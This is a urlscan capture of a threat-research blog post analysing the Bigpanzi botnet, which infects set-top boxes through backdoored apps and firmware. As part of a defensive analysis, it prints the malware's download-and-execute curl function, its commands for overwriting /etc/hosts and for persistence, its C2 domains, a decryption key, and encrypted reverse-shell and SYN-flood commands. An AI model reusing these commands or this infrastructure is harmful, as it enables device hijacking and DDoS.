blog.xlab.qianxin.com Open in urlscan Pro
240e:c3:2002:5::e1 Public Scan

Back to summary

URL:
https://blog.xlab.qianxin.com/bigpanzi-exposed-hidden-cyber-threat-behind-your-stb/
Submission: On April 24 via manual (April 24th 2024, 7:14:18 am UTC) from DE — Scanned from DE

Form analysis
0 forms found in the DOM

Text Content

奇安信 X 实验室
* Home
* About

Botnet

BIGPANZI EXPOSED: THE HIDDEN CYBER THREAT BEHIND YOUR SET-TOP BOX

*
*
*

ALEX.TURING, ACEY9, ROOTKITER

2024年1月15日 • 33 min read
1. Background
2. The Identity of Bigpanzi
3. Scale
4. Governance
5. Infection
1. Android: APP Infection
2. Android: Backdoored OTA Firmware Infection
3. eCos: Backdoored "SmartUpTool" Firmware Infection
6. Analysis of Bigpanzi Samples
7. 0x00: Countermeasures
1. Modified UPX Shell
2. Dynamic Linking
3. OLLVM Techniques
4. Anti-Debugging Mechanism
8. 0x01: Pandoraspear Analysis
1. 1.1 Hosts Hijacking
2. Q: Why does pandoraspear hijack HOSTS files?
3. 1.2 Launching Pcdn & Reporting Device Status
4. 1.3 C2 Communication
5. 1.4 Commands
6. v1 & v2 Cmds
7. v4-v10 Cmds
8. 1.5 Communication Experiment
1. Test Device Configuration:
2. Test Server Configuration:
3. Reverse Shell Command:
4. SYN Flood Command:
9. 1.6 Gifts From Command Tracking
9. 0x02: Pcdn Analysis
1. 2.1 Decryption
2. 2.2 Persistence
3. 2.3 Building the PCDN Network
1. 1: Registering the Node with Pandora-CDN Center
2. 2: Port Mapping
3. 4: Components Related to Pandora-CDN
4. 0x5: HTTP Server
4. 2.4 Device "Weaponization"
5. 2.5 Gifts from Pcdn
10. 0x03: Analysis of DDoS Tools
1. Gifts from the DDoS Builder
11. 0x04: Preview of the Next Article
12. 0x05: Conclusion
13. IOC
1. pandoraspear sample
1. pandoraspear C2
2. pcdn sample
3. pcdn C2
4. pcdn domain
5. DDoS builder C2
6. Downloader
7. Hosts Downloader
8. Hosts
9. Appendix

BACKGROUND

Some time ago, we intercepted a dubious ELF sample exhibiting zero detection on
VirusTotal. This sample, named pandoraspear and employing a modified UPX shell,
has an MD5 signature of 9a1a6d484297a4e5d6249253f216ed69. Our analysis revealed
that it hardcoded nine C2 domain names, two of which had lapsed beyond their
expiration protection period. We seized this opportunity to register these
domains to gauge the botnet's scale. At its peak, we noted approximately 170,000
daily active bots, predominantly in Brazil.

Upon realizing that we had secured their domains, the group countered
aggressively. They bombarded our domains with DDoS attacks to force them offline
and manipulated the hosts files of the infected devices. This strategy redirects
certain domain names to specific IP addresses, bypassing the normal DNS
resolution process used to find the IP addresses of Command and Control domains.
This greatly limits our ability to observe and track them.

We finished analyzing the sample fast and started monitoring the botnet's attack
instructions. This led us to various download scripts, such as a.sh, pd.sh, and
cpcdn.sh. These scripts either directly provided additional implants for the
syndicate, like pcdn, ptcrack, and p2p_peer, or indirectly expanded our insight.
Notably, a discernible pattern in the Downloader URLs within these scripts led
us to 22 such URLs. These were hard-coded into a set of APKs used for deploying
pandoraspear/pcdn-containing Android platform firmware upgrades. Moreover, the
implants unraveled further connections. For instance, specific strings in pcdn
pointed us to two Windows platform DDoS tools linked to the group. These tools
further led us to 32 eCos platform firmwares embedding five domains, which
shared the same IP for C2 resolutions as pcdn.

As our investigation and source tracing deepened, a major cybercrime syndicate,
active since 2015, gradually surfaced. This syndicate primarily targets Android
OS TVs and set-top boxes, as well as eCos OS set-top boxes. Differing from
typical botnets spreading through 0/N day vulnerabilities, this group's modus
operandi involves enticing users to install free or cheap audio-visual apps or
firmware updates, embedding backdoor components. Once installed, these devices
transform into operational nodes within their illicit streaming media platform,
catering to services like traffic proxying, DDoS attacks, OTT content provision,
and pirate traffic. Considering the botnet's enormous scale and the filename
pandoraspear, we dubbed the cybercime syndicate Bigpanzi.

Since we started tracking their commands, we've been quietly collecting evidence
and steadily working to trace Bigpanzi's origins, with the ultimate goal of
delivering a decisive strike against them.In May 2023, Dr.WEB spotlighted
pandoraspear, and on September 6, they shared their discoveries with the
community, enriching our understanding of pandoraspear's spread through pirated
traffic APKs.

Bigpanzi's menace extends beyond the infamous DDoS attacks. It can misuse
controlled Android TVs and set-top boxes to disseminate any form of visual or
audio content, unbound by legal constraints. This mode of attack has manifested
in real-world incidents, like a network attack on set-top boxes in the UAE on
December 11, 2023, where regular broadcasts were substituted with footage of the
Israel-Palestine conflict. The potential for Bigpanzi-controlled TVs and STBs to
broadcast violent, terroristic, or pornographic content, or to employ
increasingly convincing AI-generated videos for political propaganda, poses a
significant threat to social order and stability.

With these factors in mind, we decided to document our findings in this article,
sharing our discoveries with the community in hopes of collaboratively
dismantling this cybercrime syndicate that has been in hiding for eight years.

THE IDENTITY OF BIGPANZI

Within the Pcdn sample, we identified a downloader domain: ak.tknxg.cf. Through
Google searches, we unearthed two pivotal leads. One provided instructions for
device upgrades, and the other offered guidance on device repairs. Particularly
striking was the YouTube channel at
[https://www.youtube.com/@customersupportteam49], teeming with device
operation-related videos, all conveying a pronounced “official” vibe.

On the official website of a Spanish manufacturer FoneStar, specifically on the
product page for the RDS-585WHD, we located an eCos system firmware,
b0a192c6f2bbd7247dfef36665bf6c88.

This firmware shared identical DDoS task names and method names with Pcdn,
marking it as an “official firmware embedded with malware.” (Note: This doesn’t
directly implicate FoneStar as Bigpanzi!)

The uncovering of this “official video account” and “official malware-infused
firmware” led us to speculate about the real identity of Bigpanzi. Our tracing
efforts have indeed been fruitful, revealing significant evidence pointing
towards a company. However, we choose not to divulge the details here. If you're
curious about the full story, feel free to contact us for more details !

SCALE

We successfully hijacked two C2 domains of pandoraspear: mf1ve.com and
ftsym1.com. During a seven-day observation period, the peak daily active bots
were around 170,000, primarily in Brazil. Unfortunately, the authors countered
by modifying Hosts and launching DDoS attacks. We didn’t engage much in this
confrontation, voluntarily ceased resolving, and consequently lost this
perspective. On August 15, 2023, we reactivated the resolution for mf1ve.com and
observed a peak daily bot activity of 77,849, with the count on October 13 being
27,446.

In September 2023, we hijacked the downloader domain dyanoe.com from pcdn,
observing a peak daily bot activity of 80,816 on October 13.

What’s the relationship between pandoraspear and pcdn? Early download scripts
like a.sh or na.sh contained segments where pd.sh downloads updates for
pandoraspear and cpcdn.sh for pcdn, appearing in pairs on compromised devices.

However, in the current primary download script naa.sh, pandoraspear appears
alone, with pcdn-related code being commented out. Thus, data observed through
dyanoe.com can be considered as residual data. The sum of data from both
mf1ve.com and dyanoe.com likely represents the true scale.

After deduplicating the data, the peak daily active bots on October 13 were
107,819. Adding up the data from both domains on the same date, 27,446 + 80,816
= 108,262, which is only 443 more than 107,819. The overlap is minimal,
confirming that the botnet's scale exceeds 100,000.

The botnet nodes are predominantly distributed across Brazil, amassing over 1.3
million distinct IPs since August.

The distribution of bot nodes in Brazil is primarily in São Paulo.

GOVERNANCE

A botnet of 100,000 is quite substantial, but we believe the actual size may be
larger due to two factors:

* Observational Limitations: The hijacked C2 and downloader domains are just
one of many options for pandoraspear/pcdn, leading to potential omissions.
* Device Specificity: TVs or STBs as compromised devices might not be powered
on 24/7, also leading to data omissions.

Some may wonder if there's a way to measure the true daily active scale of
pandoraspear. The answer is yes! Pandoraspear updates the device's hosts through
the following URLs, theoretically allowing Amazon to track all visiting IPs.

pandoramain-1794008345.us-west-2.elb.amazonaws.com:8080/marketdatas/dns/hosts
pandorabackup-1322908155.us-west-2.elb.amazonaws.com:8080/marketdatas/dns/hosts

Is it possible to govern such a large-scale botnet? Again, the answer is
affirmative!

1. Solution 1: We control two of pandoraspear's nine C2s. By responding
according to the network protocol, we can take over part of the network.
2. Solution 2: Pcdn executes payloads from the downloader using the system
command without verification. We can issue scripts via the downloader to
modify hosts, thereby taking control of part of the network.
3. Solution 3: Amazon could take over the domains used by pandoraspear to host
hosts files. By distributing new hosts files to hijack C2s, they could take
control of the entire network.

INFECTION

How does such a large-scale botnet infect devices? Currently, we know that
Bigpanzi targets Android and eCos platforms, employing the following three
methods to infect user devices:

1. Pirated movie & TV apps (Android)
2. Backdoored generic OTA firmware (Android)
3. Backdoored "SmartUpTool" firmware (eCos)

ANDROID: APP INFECTION

Dr.Web has already conducted a detailed analysis of this method in their blog,
which interested readers can refer to for more information.

ANDROID: BACKDOORED OTA FIRMWARE INFECTION

The second method involves backdoored generic OTA firmware. We discovered this
while tracking commands for pandoraspear, receiving instructions to download and
execute scripts containing the following code snippet. We identified
'stb-download/tool/' as a strong characteristic, leading us to potentially
surprising findings when traced.

function dl_file() {
cd /data/ && rm -rf pdbak && curl "http://fadfatest.pneydn.com:8080/stb-download/tool/$1" -o pdbak && chmod 755 pdbak
}

Indeed, hunting with "/stb-download/" revealed 22 suspicious domains following a
unified pattern: stb-download/s905{}/package_list.xml, distributed across 7 APKs
belonging to 2 different packages.

For instance, 606939075437b985bce0d46b080419d9 in
swl.app.Upgrade.UpdateHttpClient's setUrl method shows the mentioned URL.

These APKs mainly download and upgrade firmware based on different models. For
example, xtsj.sisenji.com's package_list.xml combines the URL and NAME in
Payload to form an OTA firmware download address.

From this address, we downloaded a firmware with an MD5 of
8b42856160806089fc63a97b0f31841d. Upon extraction, we found familiar friends
pandoraspear and pcdn in its /system/bin directory. From 18 URLs, we extracted 4
firmwares, spanning 2019 to 2023, all containing pandoraspear or pcdn,
confirming Bigpanzi's development of backdoored OTA upgrade packages for device
infection.

The setUrl method also includes many model.equalsIgnoreCase("Ebox") codes for
device model comparison. We identified 12 different device models targeted by
Bigpanzi across 7 APKs:

Ebox Obox Hbox+ Htv-6h H6-INT Luan2 A3 IceCream Tigre 2 A3 Pro H7 UniTV

Additionally, we found backdoored firmware on forums like fonestero.com, such as
a post by user EL_LARA, offering firmware named IRIS1800-4K_Pro_11.08.2023.zip
with MD5 b77b797ac55e378f952ce120bab97b12.

This firmware, a compressed package, contained core components of Bianpanzi like
pandoraspear and pcdn.

ECOS: BACKDOORED "SMARTUPTOOL" FIRMWARE INFECTION

During the trace of Pcdn, we found a DDoS Builder linked to this cybercrime
syndicate, with one of its C2 domains being ruetsm.mkuspt.com. Numerous
firmwares starting with SmartUpToolRomFile related to another subdomain,
boxupsev.mkuspt.com, contained Pcdn's unique attack vector ddiy01task.

For example, d71e54f42d6b45604cf29780256032d8, whose format we weren't familiar
with, was forcibly extracted using binwalk.

File A0038 contained many strings related to Pcdn's DDoS functionality, and five
domains resolved to the same IP as Pcdn's C2, suggesting a backdoored firmware
with a module similar to Pcdn's DDoS function.

This firmware, named
Nueva_EMU_103_RDS_585_WHD_24_09_2021_Emu_Limpia_sin_canales_con_el_logo_Fonestar
on VT, was also found on the fonestero.com forum, posted by the same EL_LARA.

In conclusion, Bigpanzi spreads backdoored firmware through various STB, DVB,
and IPTV forums to infect devices running Android or eCos systems.

ANALYSIS OF BIGPANZI SAMPLES

The Bigpanzi group uses a wide range of sample types, including PE, DEX, and ELF
formats. This analysis will begin with the ELF format pandoraspear, reverse
engineering it to uncover the methods of infection, the devices targeted, the
operational tactics, and ultimately to map out the expanse of this vast
cybercrime network.

Before delving into the reverse engineering, let's first look at the
countermeasures employed by Bigpanzi's samples at both the binary and runtime
levels. These strategies have been crucial in keeping them hidden from security
radars for an extended period and are deceptively simple yet highly effective.

0X00: COUNTERMEASURES

MODIFIED UPX SHELL

The pandoraspear sample utilizes UPX for packing, but with a twist: the magic
number is altered to 0x71284075. This particular magic number can be seen as a
signature of the group, given its consistent use over time. To unpack, simply
replace the magic number with 0x21585055 (UPX!) and then proceed with upd -d.

DYNAMIC LINKING

Pandoraspear relies on dynamic linking and the use of an external libcurl
library. This dependency is a key factor in its prolonged low detection rate, as
it often fails to run in standard sandbox environments. To execute or debug the
sample, an appropriate version of libcurl.so is necessary. In our analysis, we
used a libcurl library with the hash 49F65662C089C5E009FB76AF1971F9DA.

OLLVM TECHNIQUES

Pandoraspear has been processed with OLLVM, applying control flow flattening and
instruction substitution. The evolution from versions 8 to 10 shows minor
functional changes but a significant increase in the number of flattened
functions and passes. In IDA, this is evident as an increase in the number of
blocks within a function. For example, a main function in v8 that initially had
168 blocks expanded to 1110 blocks post-flattening, and in v10, it ballooned to
a staggering 1947 blocks.

For de-flattening, various methods and tools are already available in the
community. We employed the "Dynamic Execution + LOG Recovery" approach, which is
straightforward and effective. The optimal solution, however, is to find
versions that weren't compiled with OLLVM. Luckily, in the early stages of our
investigation, we discovered versions 1 and 2 without OLLVM, which greatly
facilitated our initial reverse engineering process.

ANTI-DEBUGGING MECHANISM

Pandoraspear employs an anti-debugging technique by reading the TracerPid from
"/proc/{PID}/status" to determine if it's being debugged (non-zero value).

0X01: PANDORASPEAR ANALYSIS

Since 2015, pandoraspear has been continuously evolving, with the latest version
being v10. We have captured eight different versions of this malware, including
v1, v2, v4, v6, and up to v10. A cross-comparison of these versions reveals that
their main execution logic remains consistent, with variations primarily in
aspects such as shell packaging, usage of OLLVM for compilation, and the range
of supported commands. Notably, the pandoraspearrk version stands out as being
significantly larger than the others. This increase in size is not due to added
functionality but rather because it embeds the curl library.

In summary, pandoraspear is a backdoor trojan targeting Android systems,
characterized by its straightforward and clear execution logic, which can be
divided into three main steps:

1. DNS Hijacking: Initially, it requests an encrypted hosts file from a remote
server. After decrypting this file, pandoraspear replaces the /etc/hosts
file on the compromised device, thereby achieving DNS hijacking. This step
is crucial for controlling the device's network traffic and redirecting it
as needed.
2. Establishing Communication with C2 Servers: The malware then establishes
communication with a Command and Control (C2) server. This C2 can be
specified via the command line, decrypted from /data/.ms, or be hardcoded
within the malware itself. This step is vital for receiving updates,
instructions, and transmitting data back to the attackers.
3. Executing Commands from C2: Finally, pandoraspear awaits instructions from
the C2 server, ready to execute various functions such as launching
Distributed Denial of Service (DDoS) attacks, initiating a reverse shell, or
executing other commands as directed. This functionality demonstrates the
malware's capability to perform a range of malicious activities remotely
controlled by the attackers.

The following analysis will delve into the details of these three key steps,
exploring how pandoraspear operates and the implications of its actions on
infected Android systems. By understanding its methodology, we can gain insights
into the malware's capabilities, objectives, and the threats it poses.

1.1 HOSTS HIJACKING

Pandoraspear employs a method of DNS hijacking by modifying the /etc/hosts file.
It starts by using libcurl to download an encrypted hosts file from a hardcoded
URL in the malware sample. This file is then saved locally as /data/.hosts.
Different versions of the malware contain slightly different hardcoded URLs. For
detailed URLs, please refer to the IOC (Indicators of Compromise) section. The
primary URL currently in use is
http://pandoramain-1794008345.us-west-2.elb.amazonaws.com:8080/marketdatas/dns/hosts.
The content of this downloaded file is encrypted.

It's noteworthy that in the parent directory 'dns' of the URL used by
pandoraspear, we discovered numerous backups of earlier hosts files, dating back
to 2018. This finding indicates that the Bigpanzi group has been actively
maintaining, updating, and expanding its operations over several years.

The decryption process for the hosts file used by pandoraspear can be broken
down into three steps, and a complete decryption script is provided in the
appendix:

1. Code Table Replacement: This step involves replacing specific characters or
sequences in the encrypted file according to a predetermined code table.
2. Bit Shifting Calculation: This involves processing every six bytes of the
encrypted data, shifting their bits to obtain four bytes of decrypted data.
3. Blowfish ECB Decryption: The final step is to decrypt the data using the
Blowfish algorithm in ECB (Electronic Codebook) mode. The key used for
decryption is the hardcoded string 'zAw2xidjP3eHQ'.

Taking the hosts file dated "07 Nov 2023 07:20:00" as an example, decryption
using the script reveals part of the hosts file. In this decrypted segment, it's
observable that the C2 domain names we hijacked are redirected to pandoraspear's
own C2 IP, 71.19.252.13.

Once the /data/.hosts file is decrypted, the following commands are used to
overwrite the system's /etc/hosts file:

# 1:enable write

/system/xbin/busybox mount -o rw,remount /dev/block/system /system
mount -o rw,remount /dev/block/system /system
mount -o rw,remount /

# 2:replace /etc/hosts
/system/xbin/busybox cp -ar /data/.hosts /etc/hosts && chmo d 644 /etc/hosts && busybox rm -rf /data/.hosts
/vendor/xbin/busybox cp -ar /data/.hosts /etc/hosts && chmo d 644 /etc/hosts && busybox rm -rf /data/.hosts

# 3: disable write
/system/xbin/busybox mount -o ro,remount /dev/block/system /system
mount -o ro,remount /dev/block/system /system

Q: WHY DOES PANDORASPEAR HIJACK HOSTS FILES?

Hijacking the HOSTS file is not an overly sophisticated technique, but when used
effectively, it can have significant effects. We believe pandoraspear hijacks
HOSTS files for the following three purposes:

1. Traditional Malicious Intentions: This includes website blocking, evasion of
intrusion detection systems, information theft, and phishing. By redirecting
traffic to different domains, pandoraspear can manipulate the user's web
experience and intercept or redirect data for malicious purposes.
2. Protecting Its Own Assets: In cases where C2 (Command and Control) or other
important operational domains are hijacked or sinkholed, modifying the HOSTS
file can help regain control. This is a direct method to redirect traffic to
a new domain controlled by the attackers, even if the original domain is
compromised.
3. Facilitating Operational Management: As a long-standing cybercrime
operation, the group might use certain domains for short-term operations or
testing. By using the HOSTS file to redirect traffic, there is no need to
formally register these domains, thus reducing operational costs. This can
be especially useful for temporary or experimental campaigns, allowing for
quick changes without the need to manage domain registrations and DNS
records.

1.2 LAUNCHING PCDN & REPORTING DEVICE STATUS

Pandoraspear initiates two key tasks, runpcdn and report_status, through
thpool_add_work. The former is responsible for starting the pcdn process, while
the latter is tasked with reporting the status of the compromised device to the
Command and Control (C2) server.

In both of these functions, pandoraspear employs a novel encryption method to
protect sensitive strings. This approach is designed to prevent the immediate
revelation of its functionalities through straightforward analysis.

The following is an equivalent Python implementation of the code depicted in the
above diagram.

def decbuf(buf):

leng=buf[0]^buf[1]^buf[2]
out=''
for i in range(3,leng+3):
tmp=((buf[i]^buf[1])-buf[1])&0xff
out+=chr((tmp^buf[0]))
print(out)

Taking the ciphertext in runpcdn as an example.

After decryption

In fact, runpcdn merely employs the sprintf function to assemble the strings
shown in the diagram into a script. This script is then executed using the
system function. Its purpose is to ascertain whether the pcdn process is active
on the system. If it's not, the script initiates either /system/bin/pcdn or
/data/.pcdn.

#!/system/bin/sh
pid=`ps|grep -v grep|grep "/system/bin/pcdn" |awk '{print $2}'`
if [ -z $pid ];then
/system/bin/pcdn >/dev/null 2>&1 &
or
/data/.pcdn >/dev/null 2>&1 &
fi

1.3 C2 COMMUNICATION

Pandoraspear establishes communication with its Command and Control (C2) servers
in a specific order. In versions before v6, all three of the following methods
were supported, but from version v7 onwards, only the last two are supported:

1. Command Line Specified: The C2 server is specified via command-line
arguments.
2. /data/.ms File: The C2 server information is stored in an encrypted form in
this file.
3. Hardcoded in the Sample: The C2 server is hardcoded within the malware
sample.

It's important to note that the C2 information in the /data/.ms file is
encrypted and the decryption method is the same as that used for the hosts file.

If the C2 from the /data/.ms file fails, pandoraspear defaults to using the
hardcoded C2.

According to Dr.Web's analysis, it was initially believed that there were only
four C2 servers, but this is an understatement. In reality, there are four
groups of C2 servers, each group containing three servers, making a total of
nine unique C2 servers after deduplication.

ok3.mf1ve.com
ok3.mflve.com
abcr.ftsym1.com
pcn.panddna.com
ppn.pnddon.com
apz.bsaldo.com
apz.pdonno.com
jgp.pdltdgie.com
romatotti520.xxxxx (mask)

Once pandoraspear obtains a C2 address using any of the above methods, it
attempts to establish communication with the C2 server's port 9999 and sends
encrypted device information to signal that it's online. The source of the
device information depends on whether the serial number can be successfully
read:

1. Successful Serial Number Retrieval: If the serial number is successfully
obtained, it's concatenated with the device's country, city, ISP, and other
information to form the device information (Format 2).
2. Serial Number Retrieval Failure: If the serial number cannot be read, the
device's MAC address is used instead (Format 1).

The online information communicated by pandoraspear to the C2 server uses the
same encryption method as that employed for the hosts file. By examining two
actual online packets received by the sinkhole server, and decrypting their
content, we can validate the previous analysis. In the decrypted content, "1000"
denotes an online status signal, and "0008", "0010" represent the version
numbers of the malware.

* format 1

2Sk28.BdtyL19pbXp.MWRJC1dnVSR1HVx041cj2M10PhgOU1f5qPA0zCT/c/
# decryption
1000@12.002C:DD:5F:07:85:48@0010@19805@\x00

* format 2

GYQL4.o/a6t00O0Tr/gnAwg1yShGO0/cuPb.iqo9T073FpJ/sIk3q.oCJJz.VLr5K1vRpsW.pQhuT1vo6W31Q0g/h0OilPe.Swr2C0MKukK0Nokko0Q1I7l/yrCMv.GmGlu0oNPl7/R7/fi0wwZcC.yH.6F/tjiKO11z16i.

#decryption
1000@1a.01-22.10-22137263@0008@8367@193d3d@BR@Braganca Paulista@Redenilf Servi\xc3\xa7os de Telecomunica\xc3\xa7\xc3\xb5es Ltda@\x00\x00

For instance, considering the online requests monitored by a sinkhole on October
13th, the comparison between version numbers and the number of requests is
illustrated in the table below, indicating that versions 8, 9, and 10 are the
most prevalent at present.

Version Request Count 0010 992537 0008 175722 0009 46178 0007 12397 0005 9360
0006 4785 0004 3264

1.4 COMMANDS

Once online, pandoraspear begins to await commands issued by the C2 (Command and
Control) server. These commands are encrypted in the same manner as the hosts
file, and once decrypted, their format appears as cmd@cmd_item1@cmd_item2@...@.
Through tracking, over 100,000 such commands have been received, with recent
ones including:

Based on the format of the commands, we can discern that in the diagram above,
the numbers 88, 5000, and 6269 represent different commands. But what are their
functions? Specifically, 88 initiates a reverse shell, 5000 specifies the C2
server via /data/.ms, and 6269 executes a command. Beyond these, pandoraspear
also supports commands for DDoS, self-updating, and more. For a comprehensive
list of additional commands and their respective functions, please refer to the
table below.

V1 & V2 CMDS

Cmd Descrption 11 Add dns via /etc/hosts 12 Del dns via /etc/hosts 21 Download
new version to /koocan/savebin, update 31-38 Pandoraspear ddos vectors:
syn,upd,icmp,mix,smurf,tagr3,cc,dnsflood 88 Reverse shell 110 Stop ddos 3000
Write new c2 to /data/.ms, and connect to the server 5000 Write new c2 to
/data/.ms 5555 Repalce c2 in /data/.ms with new c2 6269 Execute cmd

V4-V10 CMDS

Versions subsequent to v4 (or v3) support all commands from v1 and v2, and
introduce some new features. Among the most notable is the inclusion of support
for Mirai attack vectors.

Cmd Descrption 39 11 mirai ddos vectors 200 Check if the MD5 of a file matches
the provided MD5 and return the result to C2 201 Similar with 200, but if not
match, download the provided MD5 4000 Add a new task into threadpool: Download
and decrypted the freeze hosts, add new iptbales rules to drop the traffic
related with freeze hosts 4001 Exec iptables -D INPUT %d ，delete the specific
rule 4004 Add a new task into threadpool: Execute cmd return result to C2 4007
write info into /dec/block/hide(offset 0x2800 or 0x2c00)

1.5 COMMUNICATION EXPERIMENT

To validate the accuracy of the analysis, a communication experiment was
conducted. The setup involved creating a file /data/.ms on a test device
containing the IP address of a test server set up as a fake C2 (Command and
Control) server. When the fake C2 received an online packet, it issued a reverse
shell command and a SYN flood command. The encrypted and decrypted forms of
these commands were as follows:

TEST DEVICE CONFIGURATION:

* /data/.ms content:
* Encrypted: jTyzJ0Jsy9J0.dlr6.kpjwj1
* Decrypted: 45.14.106.78

TEST SERVER CONFIGURATION:

* Fake C2 listening on port 9999, netcat (nc) listening on port 12345.

REVERSE SHELL COMMAND:

* Encrypted: S6uhZ0bk5OR/2GoxK1ddQhJ1zMcR3//8TkY/
* Decrypted: 88@45.14.106.78@12345@\x00\x00

SYN FLOOD COMMAND:

* Encrypted: o4Bmz/HksdL12GoxK1ddQhJ1DJ8g8.GoiiS1
* Decrypted: 31@45.14.106.78@8888@\x00\x00\x00

Upon receiving these commands, the test device attempted to establish a reverse
shell connection with 45.14.106.78:12345 and launched a SYN flood attack against
45.14.106.78:8888. The actual results corroborated the analysis.

The pcap (packet capture) file from the experiment likely showed that the source
addresses in the SYN flood attack were spoofed.

This method is an outdated technique for SYN attacks, and many modern data
centers implement source address validation, significantly reducing the
effectiveness of such attacks. Indeed, the DDoS attack methods embedded in
pandoraspear are somewhat dated and not highly effective, which may explain why
the Bigpanzi group started incorporating more efficient attack vectors like
those from Mirai in versions v4 (or v3) of their malware.

1.6 GIFTS FROM COMMAND TRACKING

The analysis of pandoraspear represents the first step in understanding the
Bigpanzi cybercrime group. This analysis not only reveals the existence of a
large-scale botnet operating in the wild but also raises new questions about the
scope and nature of the threat posed by Bigpanzi. Key questions include the
types of devices targeted by pandoraspear, how it spreads, and whether the group
behind it has developed other malicious implants.

In the course of a deeper investigation into this group, several downloader URLs
were discovered in the tracked commands.

http://fadfatest.pneydn.com:8080/stb-download/tool/a.sh
http://fadfatest.pneydn.com:8080/stb-download/tool/na.sh

These URLs primarily serve to download and execute scripts like pd.sh and
cpdn.sh. The pd.sh script is associated with pandoraspear,

while cpdn.sh corresponds to a new implant named pcdn.

This discovery indicates that pandoraspear does not operate in isolation; it
appears alongside pcdn. Beyond pcdn, other implants such as ptcrack,
play_station, and p2p_peer were also detected. These implants share a common
download URL pattern of /std-download/tool/, which was instrumental in
confirming the method of device infection discussed earlier.

0X02: PCDN ANALYSIS

We captured five samples of pcdn, which, unlike the continuously updated
pandoraspear, has been relatively stable. The latest modification date for pcdn
is pinned to August 2021, with an MD5 hash of 7ccdaa9aa63114ab42d49f3fe81519d9.

Pcdn's functionalities can be summarized into two main categories:

1. Building a Streaming Media Platform: The primary function of pcdn is to set
up a streaming media platform on the infected device. It uses the
Peer-to-Peer (P2P) protocol to network numerous infected devices, forming a
P2P-like Content Distribution Network (CDN). This is hinted at by the file
name pcdn itself, which implies 'P2P CDN'. Pcdn is suitable for various
applications such as video on demand, live streaming, replay, and
downloading large files. We speculate that the Bigpanzi group utilizes
Pandora-CDN for streaming pirated videos and downloading related APKs.
2. Weaponizing Devices: The secondary function of pcdn involves "weaponizing"
the infected devices. It executes commands issued by the C2 server,
including conducting Distributed Denial of Service (DDoS) attacks. This
aspect of pcdn turns regular devices into tools for cyber attacks, expanding
the operational scope of the Bigpanzi group.

2.1 DECRYPTION

For pcdn, sensitive strings related to its two main functionalities are
encrypted and stored in the data segment. The encryption method used is the same
as that of pandoraspear.

To facilitate reverse engineering, a decryption script was implemented.
(However, it's important to note that the script is not perfect; manual patching
is required at addresses 0x00057A3E and 0x00057BF6).

def decbuf(buf):

leng=buf[0]^buf[1]^buf[2]
out=''
for i in range(3,leng+3):
tmp=((buf[i]^buf[1])-buf[1])&0xff
out+=chr((tmp^buf[0]))
return out

data=ida_segment.get_segm_by_name('.data')
start=data.start_ea
buf=ida_bytes.get_bytes(start,data.size())
tmp=buf.split(b'\x00')

items=[]
for i in tmp:
if len(i) >3 and i[0]^i[1]^i[2]==len(i)-3:
items.append(i)

for item in items:
i = ' '.join(f'{byte:02X}' for byte in item)
offset=idc.find_binary(start,idaapi.SEARCH_DOWN,i)
plain=decbuf(item).encode()
print(hex(offset),plain)
ida_bytes.patch_bytes(offset+3,plain)
idc.create_strlit(offset+3,offset+len(item))

After decrypting the data segment, you would be able to view and analyze the
previously encrypted strings.

2.2 PERSISTENCE

Pcdn achieves persistence on the infected device through the use of scripts such
as init.amlogic.board.rc, lowmem_manager.sh, or set_display_mode.sh. The logic
for achieving persistence is as follows:

* If there is already a persistence command in init.amlogic.board.rc (like
service pcdn /system/bin/pcdn), then pcdn will rename /data/pcdn to
/data/.pcdn and copy it to /system/bin/pcdn. After this, it clears any
persistence commands from lowmem_manage.sh and set_display_mode.sh that
involve /system/bin/pcdn&.
* Conversely, if there isn’t a persistence command in init.amlogic.board.rc,
pcdn copies /data/pcdn to /system/bin/pcdn and then adds a persistence
command /system/bin/pcdn& to lowmem_manage.sh and set_display_mode.sh.

2.3 BUILDING THE PCDN NETWORK

PCDN turns a device into a functional node in the CDN network via these steps

1: REGISTERING THE NODE WITH PANDORA-CDN CENTER

pcdn utilizes the serial number of the device, which it obtains from one of the
devices located at /dev/block/hide, /dev/block/mtdblock4, or
/dev/block/mtdblock5. It uses this serial number to register the node with the
Pandora-CDN center. The pcdn samples have two central domain names hardcoded for
this purpose.

pcdnbus.ou2sv.com
pcdnbus-bk.a2k3v.com

The resulting network traffic is shown below:

2: PORT MAPPING

Pcdn implements port mapping using the Universal Plug and Play (UPnP) protocol.
A distinctive feature of this process is the use of "NewPortMappingDescription"
with the value set to "PCDN_H". This characteristic serves as an identifier for
the port mapping activities specifically related to PCDN. Additionally, it's
important to note that all the ports depicted in the following diagram are
dedicated to PCDN operations.

3 : DOWNLOADING REQUIRED TOOLKITS AND EXECUTING SCRIPTS TO START SERVICES

Pcdn downloads the necessary toolkit for PCDN operation through a thread named
thread_setup_pcdn_tookit.

The logic of thread_setup_pcdn_toolkit is relatively straightforward:

* The script first checks if certain files or directories exist in the system,
such as /data/srs.sh, /data/p2p/play_station, or the /data/kcptun directory.

if [ ! -f "/data/srs.sh" ];then ...
if [[ ! -f "/data/p2p/play_station" ]] && [[ ! -f "/system/bin/play_station" ]] then...
if [ ! -d "/data/kcptun" ] then...

* If these are not present, it then downloads the respective toolkit files -
pcdn.tar.gz, play.gz, ktptun.gz - from a remote server (either
fadfa.dyanoe.com:8080 or 50.7.118.114:19091). These files are subsequently
unzipped into the /data directory. It’s worth noting that the files extracted
from play.gz and kcptun.gz are actually part of what is contained in
pcdn.tar.gz.

* Finally, the script checks if the relevant component processes are running in
the system. If not, it starts the necessary components.

#!/system/bin/sh
pid=`ps|grep -v grep|grep "%s"|awk '{print $2}'`
if [ -z $pid ];then
%s
fi

The component name is inserted in place of the first %s, and the command to
start the component is placed in the second %s.

4: COMPONENTS RELATED TO PANDORA-CDN

The file list within pcdn.tar.gz includes several key components, each serving a
specific purpose within the Pandora-CDN framework:

* Streaming Media Server: In the evlls directory, srs is a streaming media
server supporting protocols like RTMP, HLS, and HTTP-FLV.
* Network Acceleration: The kcp/kcptun directory contains components related to
network acceleration.
* Shadowsocks Service: Components in the ss directory are related to the
Shadowsocks service.
* P2P Networking: The p2p directory contains p2p_peer, which is related to
networking among peers.
* Video Services: The play_station is associated with video-related services.

The various ports mentioned in the previous section about port mapping are also
configured in the configuration files of these components. For example, ports
8337 and 8388 are mentioned in the server-multi-port.json.

{
"port_password": {
"8387": "foobar",
"8388": "barfoo"
},
"method": "aes-128-cfb",
"timeout": 600
}

In summary, pcdn utilizes open-source software like srs, ss, and kcp to
transform the infected devices into SRS edge nodes and SS proxy servers. The use
of KCP (Kernel Control Path) acceleration ensures the quality of service,
